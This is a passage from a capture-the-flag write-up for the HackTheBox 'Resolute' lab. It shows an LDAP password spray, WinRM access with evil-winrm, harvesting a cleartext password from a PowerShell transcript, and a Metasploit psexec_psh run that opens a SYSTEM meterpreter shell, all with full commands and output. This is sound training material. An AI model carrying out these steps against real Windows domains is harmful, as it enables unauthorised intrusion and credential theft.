Connecting with user claire
[*] Connecting to host...
[*] Binding to host
[!] Could not bind with specified credentials
[!] {'result': 49, 'description': 'invalidCredentials', 'dn': '', 'message': '8009030C: LdapErr: DSID-0C0906A1, comment: AcceptSecurityContext error, data 52e, v3839\x00', 'referrals': None, 'saslCreds': None, 'type': 'bindResponse'}
Connecting with user paulo
[*] Connecting to host...
[*] Binding to host
[!] Could not bind with specified credentials
[!] {'result': 49, 'description': 'invalidCredentials', 'dn': '', 'message': '8009030C: LdapErr: DSID-0C0906A1, comment: AcceptSecurityContext error, data 52e, v3839\x00', 'referrals': None, 'saslCreds': None, 'type': 'bindResponse'}
Connecting with user steve
[*] Connecting to host...
[*] Binding to host
[!] Could not bind with specified credentials
[!] {'result': 49, 'description': 'invalidCredentials', 'dn': '', 'message': '8009030C: LdapErr: DSID-0C0906A1, comment: AcceptSecurityContext error, data 52e, v3839\x00', 'referrals': None, 'saslCreds': None, 'type': 'bindResponse'}
Connecting with user annette
[*] Connecting to host...
[*] Binding to host
[!] Could not bind with specified credentials
[!] {'result': 49, 'description': 'invalidCredentials', 'dn': '', 'message': '8009030C: LdapErr: DSID-0C0906A1, comment: AcceptSecurityContext error, data 52e, v3839\x00', 'referrals': None, 'saslCreds': None, 'type': 'bindResponse'}
Connecting with user annika
[*] Connecting to host...
[*] Binding to host
[!] Could not bind with specified credentials
[!] {'result': 49, 'description': 'invalidCredentials', 'dn': '', 'message': '8009030C: LdapErr: DSID-0C0906A1, comment: AcceptSecurityContext error, data 52e, v3839\x00', 'referrals': None, 'saslCreds': None, 'type': 'bindResponse'}
Connecting with user per
[*] Connecting to host...
[*] Binding to host
[!] Could not bind with specified credentials
[!] {'result': 49, 'description': 'invalidCredentials', 'dn': '', 'message': '8009030C: LdapErr: DSID-0C0906A1, comment: AcceptSecurityContext error, data 52e, v3839\x00', 'referrals': None, 'saslCreds': None, 'type': 'bindResponse'}
Connecting with user claude
[*] Connecting to host...
[*] Binding to host
[!] Could not bind with specified credentials
[!] {'result': 49, 'description': 'invalidCredentials', 'dn': '', 'message': '8009030C: LdapErr: DSID-0C0906A1, comment: AcceptSecurityContext error, data 52e, v3839\x00', 'referrals': None, 'saslCreds': None, 'type': 'bindResponse'}
Connecting with user melanie
[*] Connecting to host...
[*] Binding to host
[+] Bind OK
[*] Starting domain dump
[+] Domain dump finished
Connecting with user zach
[*] Connecting to host...
[*] Binding to host
[!] Could not bind with specified credentials
[!] {'result': 49, 'description': 'invalidCredentials', 'dn': '', 'message': '8009030C: LdapErr: DSID-0C0906A1, comment: AcceptSecurityContext error, data 52e, v3839\x00', 'referrals': None, 'saslCreds': None, 'type': 'bindResponse'}
Connecting with user simon
[*] Connecting to host...
[*] Binding to host
[!] Could not bind with specified credentials
[!] {'result': 49, 'description': 'invalidCredentials', 'dn': '', 'message': '8009030C: LdapErr: DSID-0C0906A1, comment: AcceptSecurityContext error, data 52e, v3839\x00', 'referrals': None, 'saslCreds': None, 'type': 'bindResponse'}
Connecting with user naoki
[*] Connecting to host...
[*] Binding to host
[!] Could not bind with specified credentials
[!] {'result': 49, 'description': 'invalidCredentials', 'dn': '', 'message': '8009030C: LdapErr: DSID-0C0906A1, comment: AcceptSecurityContext error, data 52e, v3839\x00', 'referrals': None, 'saslCreds': None, 'type': 'bindResponse'}
As you can see, the user melanie appears to be match for Welcome123!.
Connecting with user melanie
[*] Connecting to host...
[*] Binding to host
[+] Bind OK
[*] Starting domain dump
[+] Domain dump finished
At first we can attempt to use this user/password combination against SMB but unfortunately it led us nowhere, but see below as an example using smbmap.
root@kali:~/Documents/HTB-Labs/Resolute# smbmap -H resolute.htb -u "MEGABANK/melanie" -p "Welcome123!"
[+] Finding open SMB ports....
[!] Authentication error on resolute.htb
[!] Authentication error on resolute.htb
So let's take a look at some of the files created by ldapdomaindump. First, we'll look at the domain_users_by_group.html.
While focusing on the Remote Management Users, which provides the necessary permissions to access the system remotely using WinRM, we see the user melanie and the group Contractors. This means we can attempt to access the system through WinRM by using melanie (which we have a password for) and any other user that is a member of the group Contractors.
Let's see what the domain_users.html file has to say about users that are members of the Contractors group.
Let's also look at any other group memberships back in the domain_users_by_group.html.
And we see the Contractors group as a member of the DNSAdmins group. This means any user that belongs to Contractors, which is a member of the DNSAdmins group, can be used to abuse his membership to escalate to Administrator rights.
Exploitation and Gaining Access
Let's attempt to gain access with melanie through WinRM using evil-winrm, which per group membership of Remote Management Users, accessing the system through WinRM should be possible.
EVIL-WINRM
root@kali:~/Documents/HTB-Labs/Resolute# evil-winrm -i resolute.htb -u melanie -p 'Welcome123!' -s ./ps1_scripts/ -e ./exe_files/
Evil-WinRM shell v2.0
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\melanie\Documents> dir
*Evil-WinRM* PS C:\Users\melanie\Documents> cd ../Desktop
*Evil-WinRM* PS C:\Users\melanie\Desktop> ls
Directory: C:\Users\melanie\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 12/3/2019 7:33 AM 32 user.txt
*Evil-WinRM* PS C:\Users\melanie\Desktop> type user.txt
0c3be*********************978540
*Evil-WinRM* PS C:\Users\melanie\Desktop>
Well, not only we gained access but we found the user.txt flag file!!
Privilege Escalation
Since we gained access, we need to find ways to escalate privileges. At this point, it is early to try anything as we only have one set of credentials from a user that only has access privileges through WinRM. So let's keep enumerating!
*Evil-WinRM* PS C:\Users\melanie\Documents> Get-ChildItem -Path c:\ -Force
Directory: C:\
Mode LastWriteTime Length Name
---- ------------- ------ ----
d--hs- 12/3/2019 6:40 AM $RECYCLE.BIN
d--hsl 9/25/2019 10:17 AM Documents and Settings
d----- 9/25/2019 6:19 AM PerfLogs
d-r--- 9/25/2019 12:39 PM Program Files
d----- 11/20/2016 6:36 PM Program Files (x86)
d--h-- 9/25/2019 10:48 AM ProgramData
d--h-- 12/3/2019 6:32 AM PSTranscripts
d--hs- 9/25/2019 10:17 AM Recovery
d--hs- 9/25/2019 6:25 AM System Volume Information
d-r--- 12/4/2019 2:46 AM Users
d----- 12/4/2019 5:15 AM Windows
-arhs- 11/20/2016 5:59 PM 389408 bootmgr
-a-hs- 7/16/2016 6:10 AM 1 BOOTNXT
-a-hs- 1/7/2020 5:35 PM 402653184 pagefile.sys
*Evil-WinRM* PS C:\Users\melanie\Documents> Get-ChildItem -Path c:\PSTranscripts -Force
Directory: C:\PSTranscripts
Mode LastWriteTime Length Name
---- ------------- ------ ----
d--h-- 12/3/2019 6:45 AM 20191203
*Evil-WinRM* PS C:\Users\melanie\Documents> Get-ChildItem -Path c:\PSTranscripts\20191203 -Force
Directory: C:\PSTranscripts\20191203
Mode LastWriteTime Length Name
---- ------------- ------ ----
-arh-- 12/3/2019 6:45 AM 3732 PowerShell_transcript.RESOLUTE.OJuoBGhU.20191203063201.txt
*Evil-WinRM* PS C:\Users\melanie\Documents> download c:\PSTranscripts\20191203\PowerShell_transcript.RESOLUTE.OJuoBGhU.20191203063201.txt
Info: Downloading c:\PSTranscripts\20191203\PowerShell_transcript.RESOLUTE.OJuoBGhU.20191203063201.txt to PowerShell_transcript.RESOLUTE.OJuoBGhU.20191203063201.txt
Info: Download successful!
We found a directory called PSTranscripts, which sounded interesting given what a Powershell Transcript file is. So when go through this Powershell Transcript file after downloading it, we find ryan and his password in cleartext:
+ cmd /c net use X: \\fs01\backups ryan Serv3r4Admin4cc123!
After seeing the user ryan, which is a a member of the Contractors group, and this group is also a member of the DNSAdmins group, tells me the user is the one we could try to abuse and escalate privileges. One avenue we can attempt is to load an arbitrary DLL with SYSTEM privileges on the DNS server, which I provided a link as a reference.
This way was the one a lot of HTB users relied on, I parted from relying on the write privileges to a DNS server object that ryan gets from these group memberships.
As the the DNS Admin approach relies on, we can try a use a simpler method using Metasploit and the psexec_psh exploit will try and create a service in the host using a defined payload.
That being said, I'm not saying my approach is better but I'm simply sticking to the goal which is escalating privileges however means necessary.
Let's try this:
METASPLOIT
root@kali:~/Documents/HTB-Labs/Resolute# msfconsole
msf5 > use exploit/windows/smb/psexec_psh
msf5 exploit(windows/smb/psexec_psh) > set RHOSTS 10.10.10.169
RHOSTS => 10.10.10.169
msf5 exploit(windows/smb/psexec_psh) > set TARGET 0
TARGET => 0
msf5 exploit(windows/smb/psexec_psh) > set SMBDomain MEGABANK
SMBDomain => MEGABANK
msf5 exploit(windows/smb/psexec_psh) > set LHOST 10.10.14.28
LHOST => 10.10.14.28
msf5 exploit(windows/smb/psexec_psh) > set SMBUser ryan
SMBUser => ryan
msf5 exploit(windows/smb/psexec_psh) > set DryRun false
DryRun => false
msf5 exploit(windows/smb/psexec_psh) > set LPORT 17663
LPORT => 17663
msf5 exploit(windows/smb/psexec_psh) > set PAYLOAD windows/meterpreter/bind_tcp
PAYLOAD => windows/meterpreter/bind_tcp
msf5 exploit(windows/smb/psexec_psh) > set RPORT 445
RPORT => 445
msf5 exploit(windows/smb/psexec_psh) > set SMBPass Serv3r4Admin4cc123!
SMBPass => Serv3r4Admin4cc123!
msf5 exploit(windows/smb/psexec_psh) > exploit
[*] Exploit running as background job 4.
[*] Exploit completed, but no session was created.
[*] 10.10.10.169:445 - Executing the payload...
[+] 10.10.10.169:445 - Service start timed out, OK if running a command or non-service executable...
[*] Started bind TCP handler against 10.10.10.169:17663
[*] Sending stage (180291 bytes) to 10.10.10.169
[*] Meterpreter session 2 opened (10.10.14.28:22135 -> 10.10.10.169:17663) at 2020-01-07 23:11:49 -0500
meterpreter >
And we have a Meterpreter Shell, which also means the credentials found for the user ryan were good.
METERPRETER
Using Meterpreter we can do a lot of things, but in this case, let's simply see what system information we can get like the user we are running this shell as.
meterpreter > sysinfo
Computer : RESOLUTE
OS : Windows 2016+ (10.0 Build 14393).
Architecture : x64
System Language : en_US
Domain : MEGABANK
Logged On Users : 2
Meterpreter : x86/windows
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >
Here we can see privilege escalation worked using just psexec_psh as we are running this Meterpreter session as the NT AUTHORITY\SYSTEM user. Let's use the shell Meterpreter command to go to command-prompt on this host; something I didn't have to do but it is a good thing to show you can do this.
meterpreter > shell
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.
C:\Windows\system32> cd C:\users\Administrator\Desktop
C:\Users\Administrator\Desktop> dir
Volume in drive C has no label.
Volume Serial Number is 923F-3611
Directory of C:\Users\Administrator\Desktop
12/04/2019 05:18 AM <DIR> .
12/04/2019 05:18 AM <DIR> ..
12/03/2019 07:32 AM 32 root.txt
1 File(s) 32 bytes
2 Dir(s) 30,996,488,192 bytes free
C:\Users\Administrator\Desktop> type root.txt
e1d94**********************e619c
At this point, we got the root flag and owned the system. Goal Achieved!
